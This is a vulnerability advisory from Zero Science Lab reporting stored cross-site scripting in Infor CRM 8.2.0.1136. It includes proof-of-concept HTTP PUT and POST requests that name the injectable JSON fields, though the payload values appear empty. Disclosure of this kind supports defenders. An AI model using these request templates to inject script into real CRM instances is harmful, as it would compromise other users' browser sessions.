Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities Vendor: Infor Product web page: http://www.infor.com Affected version: 8.2.0.1136 Summary: Infor® CRM, formerly Saleslogix, is an award-winning customer relationship management (CRM) solution that provides a complete view of customer interactions, so your business can collaborate and respond promptly and knowledgably to customer inquiries, sales opportunities, and service requests. Infor CRM includes a robust suite of sales, marketing, and service capabilities, to offer businesses of all sizes a fast, flexible, and affordable solution for finding, winning, and growing profitable customer relationships. Desc: Infor CRM suffers from multiple stored cross-site scripting vulnerabilities. Input passed to several POST/PUT parameters in JSON format is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft-IIS/8.5 ASP.NET/4.0.30319 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5308 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php 21.01.2016 --- ---------------------------------- Affected parameter(s): description ---------------------------------- PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1 Host: intranet.zeroscience.mk {$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…} "": "" $descriptor: "" $etag: "+CgjMLB+0nA=" $httpStatus: 200 $key: "eUSERA0004IX" $lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" $post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json" $schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json" $service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json" $template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json" $updated: "/Date(1456359095000)/" $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')" accountId: null activityId: null attachDate: "2016-01-25T00:09:39Z" contactId: null contractId: null createDate: "/Date(1456359095000)/" createUser: "UUSERA0005W0" dataType: "R" defectId: null description: "" details: {createSource: null} documentType: null fileExists: true fileName: "inforcrm_xss.png" fileSize: 101722 historyId: null leadId: null modifyDate: "/Date(1456359095000)/" modifyUser: "UUSERA0005W0" opportunityId: null physicalFileName: "!eUSERA0004IXinforcrm_xss.png" productId: null remoteStatus: null returnId: null salesOrderId: null ticketId: null url: null user: {$key: "UUSERA0005W0"} ----------------------------------------------------------- Affected parameter(s): Description, Location, and LongNotes ----------------------------------------------------------- POST /SLXClient/slxdata.ashx/slx/system/-/activities?format=json&_t=1456357736977 HTTP/1.1 Host: intranet.zeroscience.mk {$httpStatus: 200, $descriptor: "", ActivityBasedOn: null, Alarm: false,…} $descriptor: "" $httpStatus: 200 AccountId: null AccountName: null ActivityAttendees: {} ActivityBasedOn: null Alarm: false AlarmTime: "2016-01-24T22:45:00Z" AllowAdd: true AllowComplete: true AllowDelete: true AllowEdit: true AllowSync: true AppId: null Attachment: false AttachmentCount: null AttendeeCount: 0 Category: "Pleasantville" ContactId: null ContactName: null CreateDate: "/Date(-62135596800000)/" CreateUser: null Description: "" Details: {ForeignId1: null, ForeignId2: null, ForeignId3: null, ForeignId4: null, ProjectId: null,…} ChangeKey: null CreateSource: null ForeignId1: null ForeignId2: null ForeignId3: null ForeignId4: null GlobalSyncId: null ProjectId: null Tick: null UserDef1: null UserDef2: null UserDef3: null Duration: "0" EndDate: "/Date(1456359315286)/" LeadId: null LeadName: null Leader: {$key: "UUSERA0005W0", $descriptor: "Userovich, User"} $descriptor: "Userovich, User" $key: "UUSERA0005W0" Location: "" LongNotes: "" ModifyDate: "/Date(-62135596800000)/" ModifyUser: null Notes: "Zero Science Lab" OpportunityId: null OpportunityName: null OriginalDate: "/Date(1456358415286)/" PhoneNumber: null Priority: "1" ProcessId: null ProcessNode: null RecurIterations: 0 RecurPeriod: 0 RecurPeriodSpec: 0 RecurSkip: null RecurrenceState: "rsNotRecurring" Recurring: false Resources: {} Rollover: false StartDate: "2016-01-25T00:00:05Z" TicketId: null TicketNumber: null Timeless: true Type: "atToDo" UserActivities: {} $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userActivities?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" UserNotifications: {} $url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/userNotifications?format=json&where=Activity.Id%20eq%20%27VUSERA000CZ7%27" # Iranian Exploit DataBase = http://IeDb.Ir [2016-02-28]